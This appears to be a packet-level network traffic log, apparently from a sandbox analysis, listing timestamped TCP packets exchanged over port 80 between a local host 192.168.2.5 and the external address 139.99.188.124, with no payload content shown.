                                                                    Dec 18, 2024 09:13:15.320255041 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.320416927 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.320547104 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.321059942 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.321113110 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.321228981 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.321876049 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.321974039 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.322024107 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.322679996 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.322812080 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.322870016 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.323481083 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.323605061 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.323746920 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.324337959 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.324424028 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.324512005 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.325136900 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.325352907 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.325587988 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.325896978 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.325972080 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.326016903 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.326709986 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.326936960 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.327029943 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.327538967 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.327646971 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.327702999 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.328326941 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.328500032 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.328547001 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.329111099 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.329262018 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.329312086 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.329925060 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.330025911 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.330073118 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.330725908 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.330836058 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.330928087 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.331598043 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.331712008 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.331758022 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.332345009 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.332561970 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.332612038 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.333163023 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.333292007 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.333343029 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.333944082 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.334085941 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.334146023 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.334747076 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.334877968 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.334923983 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.335566044 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.335692883 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.335740089 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.336484909 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.336507082 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.336611032 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.337167025 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.337272882 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.337321043 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.337971926 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.338061094 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.338160992 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.338769913 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.338884115 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.339070082 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.339561939 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.339616060 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.339664936 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.340379000 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.340516090 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.340569019 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.341182947 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.341346025 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.341459036 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.342025995 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.342108965 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.342277050 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.342794895 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.342906952 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.342948914 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.343611002 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.343745947 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.343945026 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.344377995 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.344522953 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.344559908 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.345184088 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.345295906 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.345350981 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.345992088 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.346146107 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.346191883 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.346812010 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.346916914 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.346961975 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.347635984 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.347718954 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.347765923 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.497073889 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.497157097 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.497205973 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.497322083 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.497483015 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.497525930 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.497606993 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.498352051 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.498400927 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.498444080 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.499083996 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.499139071 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.499186039 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.500016928 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.500082016 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.500108957 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.500787020 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.500842094 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.500878096 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.501542091 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.501632929 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.501697063 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.502399921 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.502448082 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.502527952 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.503189087 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.503247023 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.503269911 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.503957987 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.504072905 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.504101038 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.504726887 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.504898071 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.504942894 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.505548000 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.505640984 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.505683899 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.506330013 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.506382942 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.506443024 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.507128954 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.507181883 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.507241964 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.507944107 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:15.508007050 CET4971680192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:15.508052111 CET8049716139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.998466015 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:20.998737097 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.003906965 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.003974915 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.004026890 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.009512901 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.009742022 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.009979963 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.015202999 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.015320063 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.016156912 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.019381046 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.019557953 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.023192883 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.023718119 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.023839951 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.023998976 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.027832031 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.027842999 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.028069973 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.032090902 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.032099962 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.035422087 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.037210941 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.037365913 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.037864923 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.040770054 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.040807962 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.040885925 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.044519901 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.044615030 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.044814110 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.048681974 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.150986910 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.164370060 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.164385080 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.164483070 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.165993929 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.166167021 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.166294098 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.169364929 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.182578087 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.182712078 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.182895899 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.183779001 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.183828115 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.183984041 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.186897993 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.186950922 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.187016964 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.189472914 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.189522982 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.189616919 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.192811966 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.192872047 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.192954063 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.196146011 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.196227074 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.196258068 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.199495077 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.199512005 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.199668884 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.202835083 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.202931881 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.202965021 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.206176996 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.206264973 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.206335068 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.209506035 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.209614038 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.209817886 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.212789059 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.212913990 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.213273048 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.216140032 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.216242075 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.216308117 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.219492912 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.219614029 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.219641924 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.222798109 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.222893000 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.222908974 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.226133108 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.226186991 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.226227045 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.229465008 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.229517937 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.229576111 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.232830048 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.232893944 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.232933998 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.236165047 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.236227989 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.236403942 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.239500999 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.239567995 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.239593983 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.242789984 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.242892981 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.242899895 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.246179104 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.246323109 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.246390104 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.249474049 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.249634027 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.249705076 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.252795935 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.252871037 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.252902985 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.256167889 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.256263018 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.256268024 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.259443045 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.259480953 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.259507895 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.262799025 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.262871027 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.262903929 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.266123056 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.266206026 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.355511904 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.355588913 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.355884075 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.357176065 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.357285976 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.358112097 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.360511065 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.360629082 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.361488104 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.363795042 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.392571926 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.392646074 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.392656088 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.393342972 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.393449068 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.393521070 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.395982027 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.396090984 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.396929979 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.398611069 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.398732901 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.398781061 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.401248932 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.401344061 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.401407003 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.404000044 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.404058933 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.404103041 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.406528950 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.406583071 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.406588078 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.409149885 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.409198046 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.409277916 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.411756992 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.411815882 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.411848068 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.414390087 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.414482117 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.415148973 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.417005062 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.417073965 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.417112112 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.419656992 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.419725895 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.419753075 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.422310114 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.422369003 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.422373056 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.424904108 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.425010920 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.425080061 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.427536964 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.427644968 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.427687883 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.430164099 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.430277109 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.430346012 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.432801962 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.432912111 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.432941914 CET4972980192.168.2.5139.99.188.124
